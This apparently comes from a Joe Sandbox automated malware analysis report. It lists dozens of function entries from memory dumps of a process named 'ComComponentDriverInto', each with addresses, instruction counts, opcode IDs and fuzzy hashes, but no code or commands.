                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                            • Instruction ID: d5dc2c85b432bae355b76a53ca95413327eeced6a3ef3becc07086aa69a13371
                                                            • Opcode Fuzzy Hash: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                            • Instruction Fuzzy Hash: DB21063130D8184FD7A8EB5CF8899B973D1EB5932171101BAE49EC7136D911EC828BC1
                                                            Function 00007FFD9BEBBAEB Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad9f3a90797d3fd404645984bdec8864a81e814dafafc21b875e2d2e757a06d8
                                                            • Instruction ID: 79db247678d3d3c4298d4a929df77f9e8966861214b3c46155d857b0907d1284
                                                            • Opcode Fuzzy Hash: ad9f3a90797d3fd404645984bdec8864a81e814dafafc21b875e2d2e757a06d8
                                                            • Instruction Fuzzy Hash: E6314F3160C9498FDF98EF68C4A5DA4B3E1FF68314B1406A9D04EC72E6DE25E945CB81
                                                            Function 00007FFD9BEB6ABB Relevance: .1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e3bc01aaf88f135f25047abf35bdf470af41f3c44e398090dbd9aaf47635a19
                                                            • Instruction ID: 6ba01ea78bfedb1fe1f20c367a31206055ed9f91657d21d5946bd37579a09c22
                                                            • Opcode Fuzzy Hash: 6e3bc01aaf88f135f25047abf35bdf470af41f3c44e398090dbd9aaf47635a19
                                                            • Instruction Fuzzy Hash: F531813270C9498FDF98EF68C4A5DA5B3E1FF68311B0405AED15AC7192DE25E845CB81
                                                            Function 00007FFD9BEB8EF9 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f2415f623789c11a4ab21d65a7153e568ee49a338bde46187f2d5d333fd91ab
                                                            • Instruction ID: bcf398d3b131231c4f177ecf38cd092c6136bc9929edc892df8feb4d625bf1ac
                                                            • Opcode Fuzzy Hash: 3f2415f623789c11a4ab21d65a7153e568ee49a338bde46187f2d5d333fd91ab
                                                            • Instruction Fuzzy Hash: F5315A21A0F2DE1FE77656B51C701B97FAADF43254F0901BBE088CB2E3DA091A06D741
                                                            Function 00007FFD9BEB6885 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7abe0e9274c3b1e4858828146dcdd7200499247ce62f59b90d02af5e125facc0
                                                            • Instruction ID: c5afb3871cf2d6baaafabc5888b4866197a73d508f73f8458321dc0c64aa48eb
                                                            • Opcode Fuzzy Hash: 7abe0e9274c3b1e4858828146dcdd7200499247ce62f59b90d02af5e125facc0
                                                            • Instruction Fuzzy Hash: 50312830E1E56E8EEBB8DB8984615BDB7B4FF44300F52017AD01ED61A1DE3AEA409B41
                                                            Function 00007FFD9BEB3EC9 Relevance: .1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4ba24b7866459fc1dfe0c4cfdf180f3da1cc6c6462cccf59d458f8ee81b00af
                                                            • Instruction ID: 4a31d53bfda66c033fadb5b2f9a0116d9c66a84a96d3432c79436ddba78a4de8
                                                            • Opcode Fuzzy Hash: c4ba24b7866459fc1dfe0c4cfdf180f3da1cc6c6462cccf59d458f8ee81b00af
                                                            • Instruction Fuzzy Hash: 23313421A0F6DE4FE77356AA18751F53FA89F43254F0A01BBE089CA0F3D9491A06C742
                                                            Function 00007FFD9BEBE18D Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7775bfdebcdca7b6182ee4dcc42f91f76f133c40bda2031d04b24e030676cc70
                                                            • Instruction ID: 2b9f2c27097f409ceef9cd711250d2234590704faf600d92f6b0fa1a34fe018c
                                                            • Opcode Fuzzy Hash: 7775bfdebcdca7b6182ee4dcc42f91f76f133c40bda2031d04b24e030676cc70
                                                            • Instruction Fuzzy Hash: 13319571F1991E8FDB98DA99D4629B8B3A6FF58710B114139E01ED7292CF24BD13CB80
                                                            Function 00007FFD9BEB2021 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92da6cddd6b54913c1521dcbe1eb599cee5e5f28b37eceb3e6957eb486f80c7f
                                                            • Instruction ID: 4173a039de7cd4f62ac768889f50ee0b9e51df657f5fa63773317bd4530483d3
                                                            • Opcode Fuzzy Hash: 92da6cddd6b54913c1521dcbe1eb599cee5e5f28b37eceb3e6957eb486f80c7f
                                                            • Instruction Fuzzy Hash: 87319131E0E69D8FDF55CFA8D8609BCBFB0FF59300F0501AAD04AE71A2CA296945CB51
                                                            Function 00007FFD9BEB8CE5 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71e1a13f38f88b65682d93c13fbeb0f6f247339e8c7f88fbc061f30ffd12ce5f
                                                            • Instruction ID: d02230640c2ef868b72a866e8a0eab3b0f166a73755165b9b939ff021f460bd0
                                                            • Opcode Fuzzy Hash: 71e1a13f38f88b65682d93c13fbeb0f6f247339e8c7f88fbc061f30ffd12ce5f
                                                            • Instruction Fuzzy Hash: 24213971B0EA1E4FEB69EBA848722E873D5FF54310F15027AD01DC73D2DE2969028791
                                                            Function 00007FFD9BAB0998 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4055ef258d870db7d41d6dda91f8bca4656127317a5fe668f381b7daf4b3793
                                                            • Instruction ID: b1cf7db9a94229f6bea71e2808bbcc92e15096e1804d4046e237bd7e1c0fb9c4
                                                            • Opcode Fuzzy Hash: d4055ef258d870db7d41d6dda91f8bca4656127317a5fe668f381b7daf4b3793
                                                            • Instruction Fuzzy Hash: D5212621B1892D0FF798F76C8869B7977C2EF98321F1105B9E41DC32E7DD58AC414681
                                                            Function 00007FFD9BEBA7A0 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c55af5e326714dfecc88e46cd8d5b6378dcb2664711bdbb70aad0b588bc47c62
                                                            • Instruction ID: e2228a4a577163bef035415e96630e6c194e385821356d54c92ea000770dc0d7
                                                            • Opcode Fuzzy Hash: c55af5e326714dfecc88e46cd8d5b6378dcb2664711bdbb70aad0b588bc47c62
                                                            • Instruction Fuzzy Hash: 08318B20A1E5FE4BEB3A825948744747BA5EF5130071946B6D086CB8EBCC1DB983CB91
                                                            Function 00007FFD9BEB5770 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6d899e158d85f1aa1b4bb3fd56cdc18f2dd7b4c59cba24bc24dce7f0e1037009
                                                            • Instruction ID: e4834c3fce9b7f293ab598e167f6598d55de004c895216856f27d54bc6226dae
                                                            • Opcode Fuzzy Hash: 6d899e158d85f1aa1b4bb3fd56cdc18f2dd7b4c59cba24bc24dce7f0e1037009
                                                            • Instruction Fuzzy Hash: D6313B10B1E5FA8AE73A835944709747BD5EF9131171946BAC09BCB4E7C82DB981CB81
                                                            Function 00007FFD9BEBE265 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab7a642df4f0e9e92cdeadcf5b6c56193fe06548837d1266f946f72c28539d09
                                                            • Instruction ID: 9e479ad912115d39cc174856e0b5471c853ec92361e273c37c95853d6907bc16
                                                            • Opcode Fuzzy Hash: ab7a642df4f0e9e92cdeadcf5b6c56193fe06548837d1266f946f72c28539d09
                                                            • Instruction Fuzzy Hash: C1213A31F0E65E4FEBA8D7A998766B877A4EF49310F050579E00DC72E3DA1969068740
                                                            Function 00007FFD9BEB0FB8 Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b8c180c45f84f78574e049893666cb694e21dbec422f00cf34f455f5448b84a
                                                            • Instruction ID: f70075305346921871ba64db48accc56049bbe03c522aee0ad494dfcad357385
                                                            • Opcode Fuzzy Hash: 8b8c180c45f84f78574e049893666cb694e21dbec422f00cf34f455f5448b84a
                                                            • Instruction Fuzzy Hash: 94313C30E5A54ECEDFA8EB8484A15BD77B9FF44700F510076D01ED21A2DB3AAE409741
                                                            Function 00007FFD9BEB2B92 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcdd71d9614184a0ba58bb05581d9d0f5cdbcb03f1dcc635b9a58c5f0b8f1726
                                                            • Instruction ID: d42e02a9e7f6e51320d0556b501002b2a2e994fa3b3751f5136fee251725c961
                                                            • Opcode Fuzzy Hash: bcdd71d9614184a0ba58bb05581d9d0f5cdbcb03f1dcc635b9a58c5f0b8f1726
                                                            • Instruction Fuzzy Hash: 35312931A1991D8FDFA9DF58D4A1AE9B7B1FF58310F0101AED05EE72A1CE35A9818F40
                                                            Function 00007FFD9BEB8C42 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a552263d8fb71258b7518e4433ce69005ad82d3aac3a2ae4562b316f495c9790
                                                            • Instruction ID: 4f112d484db2c1685897161f857d2bd42ecce142cc8565673c6de290ae925b58
                                                            • Opcode Fuzzy Hash: a552263d8fb71258b7518e4433ce69005ad82d3aac3a2ae4562b316f495c9790
                                                            • Instruction Fuzzy Hash: D3215E71B1A91E9FDB58DE58C4A19A9B3A5FF58310B15813AD01EC36D2CF24BD12CB80
                                                            Function 00007FFD9BEB7BC2 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6de17f76644b7069c9a03d259ef1e0ef2d8b88ca0e3091121b9c7983553dbb1a
                                                            • Instruction ID: 304df77d801213699dd4f855bca075b2c1339a7922f5816b291f88078e10faa5
                                                            • Opcode Fuzzy Hash: 6de17f76644b7069c9a03d259ef1e0ef2d8b88ca0e3091121b9c7983553dbb1a
                                                            • Instruction Fuzzy Hash: 55310931A0991D9FDFA9DB58C461AE8B7B1FF6C310F0001ADD04EE76A1CA35A941CF40
                                                            Function 00007FFD9BEB0FF2 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed378d9deb7c6038af0e144283d7abf843ffa2a22d2ea7b11fe4f9678217d284
                                                            • Instruction ID: 2c9ff3f5de07b5ac871162030377ac3104379f183ecc0029a75bad1b67d947ad
                                                            • Opcode Fuzzy Hash: ed378d9deb7c6038af0e144283d7abf843ffa2a22d2ea7b11fe4f9678217d284
                                                            • Instruction Fuzzy Hash: EB212920F1E4BF8AE73C825984755B83755EF51310B154ABAD08ACB0EBD81DBA819BC0
                                                            Function 00007FFD9BEB3673 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c55e8f5736853515e5f455fcad2971591ae96f6e9cef912131b900387aefced7
                                                            • Instruction ID: 3024e25eca9a7ec1dcd6b7e7391d8f9baddafb23041d0c0d84a555d259141c8b
                                                            • Opcode Fuzzy Hash: c55e8f5736853515e5f455fcad2971591ae96f6e9cef912131b900387aefced7
                                                            • Instruction Fuzzy Hash: F421F830F0951D8FDB69DB58D86A97873E5FF49315F01017ED04EC36A2CE25AD418B40
                                                            Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9fa3af630557dca0be6529425487ca67a05b58c9066f6a9d5015951e122199bd
                                                            • Instruction ID: 581fa6fa7b4e7f04217f9b7d90079e9498b96963930d21b3466e5ac0d2be853d
                                                            • Opcode Fuzzy Hash: 9fa3af630557dca0be6529425487ca67a05b58c9066f6a9d5015951e122199bd
                                                            • Instruction Fuzzy Hash: 39213B32B0D26D8FE732E7A99C610EC7B60EF52325F0541B3D1688B1D3DA386646CB85
                                                            Function 00007FFD9BEB3C58 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8063e330fdd9da7d68cb8f112ae6dbc806a60ca81116615b96b9decb2ce50007
                                                            • Instruction ID: 8998947648bc8f210ec5d346cb7b4ed30aff038a83b5191125423c67915e24ce
                                                            • Opcode Fuzzy Hash: 8063e330fdd9da7d68cb8f112ae6dbc806a60ca81116615b96b9decb2ce50007
                                                            • Instruction Fuzzy Hash: 6A218771B1991E8FDB58DE99D4629B8F3A1FF58340B11513AD01EC7292CE24BD12CB80
                                                            Function 00007FFD9BEB7078 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c972594b99f515d999e0c8e259ec0f286c71296c19bf7fc2383b9894043766d
                                                            • Instruction ID: 9160269debe3bc6ba93695478a95ab09843a1a16ebebc32fc1db1f57d8a2b0e0
                                                            • Opcode Fuzzy Hash: 5c972594b99f515d999e0c8e259ec0f286c71296c19bf7fc2383b9894043766d
                                                            • Instruction Fuzzy Hash: 8D215B31E1995E8FDF98DF98C8609EDBBB1FF58300F50007AD00AE72A1DE256A05CB55
                                                            Function 00007FFD9BEB8B69 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e6206191abe88948e6a28d243ee768c5faf85fe04d825e9b04bc76439957af50
                                                            • Instruction ID: 6cf2cae679111fc43b0b0bffe1d8b954ca9346dccda055e755f600bcffcabdd5
                                                            • Opcode Fuzzy Hash: e6206191abe88948e6a28d243ee768c5faf85fe04d825e9b04bc76439957af50
                                                            • Instruction Fuzzy Hash: 53115971B0E75D1FE77045A548641E93BE9EB5A350B050077D089D73A1CD592D4287A0
                                                            Function 00007FFD9BEB8F40 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4bc3369f24d4d8ba6b6be7514ff800f5edb5ad02bf7f3570e8e73f57e347167f
                                                            • Instruction ID: dd4094db2edcd24423a4b724cf0346b04fbf6f68210758995c9ad052e3c309fa
                                                            • Opcode Fuzzy Hash: 4bc3369f24d4d8ba6b6be7514ff800f5edb5ad02bf7f3570e8e73f57e347167f
                                                            • Instruction Fuzzy Hash: 0721DE10A1F2DE0FE76303B508700682FA68F4326471E01FBD0C9CE2E3EA0D1A4AE752
                                                            Function 00007FFD9BEB36D7 Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3137c78a73f91ae2c4ff75aec8a8545be7c083d7b3d40eec04e5989fffaa48cf
                                                            • Instruction ID: 6e5712b1eede6836c33b332adbb9bc284dd3e7112adf00df9e7b50d548d2e8a1
                                                            • Opcode Fuzzy Hash: 3137c78a73f91ae2c4ff75aec8a8545be7c083d7b3d40eec04e5989fffaa48cf
                                                            • Instruction Fuzzy Hash: 23114230B086188FDB98DB58D895AA9B3E1FF59315B1141AAD04ED76A6CA31AC418B40
                                                            Function 00007FFD9BEB0FF0 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d10540654785e3827557e1135f014bc27f226fc4ceb3b3fff131705db371c28e
                                                            • Instruction ID: c5924119e6310828325ed754c99e52cbb0e00db7519d7f9a33d0dc22b3fad87a
                                                            • Opcode Fuzzy Hash: d10540654785e3827557e1135f014bc27f226fc4ceb3b3fff131705db371c28e
                                                            • Instruction Fuzzy Hash: 6B21D720E1D4BF86E63C825D84715B87759EF50311B154A76D48BCB0EBD81DBA809BC0
                                                            Function 00007FFD9BEB3F10 Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 175f4d23e0d9f2e0e87cdaa20f089201e057392c81970b6062d419325c98b20c
                                                            • Instruction ID: 1d692c083bfbac77d320c0715665fe2ddbf70eb92ba8ec20018f8aceae49843f
                                                            • Opcode Fuzzy Hash: 175f4d23e0d9f2e0e87cdaa20f089201e057392c81970b6062d419325c98b20c
                                                            • Instruction Fuzzy Hash: 2E219A41A0F3DA8FE76753B908750B42FB84F03164B1A01FBE0CA8A0F3E94D1A06E752
                                                            Function 00007FFD9BEBA7D0 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e12282365288378e42fe0dc8935542c863c9465904b267bd6518ff8630a21d1a
                                                            • Instruction ID: 7b2ca25c27dd2d30c699ee8dc5aae35fdb8741e3c32de5dcf55207adddaa5e9a
                                                            • Opcode Fuzzy Hash: e12282365288378e42fe0dc8935542c863c9465904b267bd6518ff8630a21d1a
                                                            • Instruction Fuzzy Hash: EA113A30A1D47F86FE3D824984788B47395FF64301B154676D09B8B9EACC2DBA828FD0
                                                            Function 00007FFD9BEB57A0 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c456aaa1524401bde5738275ee4d9a47c8ac68bac2ab808b50d35aae1ecb912d
                                                            • Instruction ID: 84c03a317eb18181a4d097cbaf636f32e6c6a38708426e014af1ac0b0b5ebbc5
                                                            • Opcode Fuzzy Hash: c456aaa1524401bde5738275ee4d9a47c8ac68bac2ab808b50d35aae1ecb912d
                                                            • Instruction Fuzzy Hash: 0211DA10B2E47F86F638864994749B473D5EF90301B25467AD15F8B4EBC82DBA819FC0
                                                            Function 00007FFD9BEB4820 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63e48e0e67a13fee07b3663952f5f2210500b76e692e81a0cc12e237b0c48128
                                                            • Instruction ID: 52341fae37971e4c7eb096bb8de2ed140e3007e9763b44296550a5cd31097e4a
                                                            • Opcode Fuzzy Hash: 63e48e0e67a13fee07b3663952f5f2210500b76e692e81a0cc12e237b0c48128
                                                            • Instruction Fuzzy Hash: 5B112731B0991E4FD769EF6594259F973A0FF58358B00063EE00ECB5E3CE28B5458790
                                                            Function 00007FFD9BEB0FC8 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
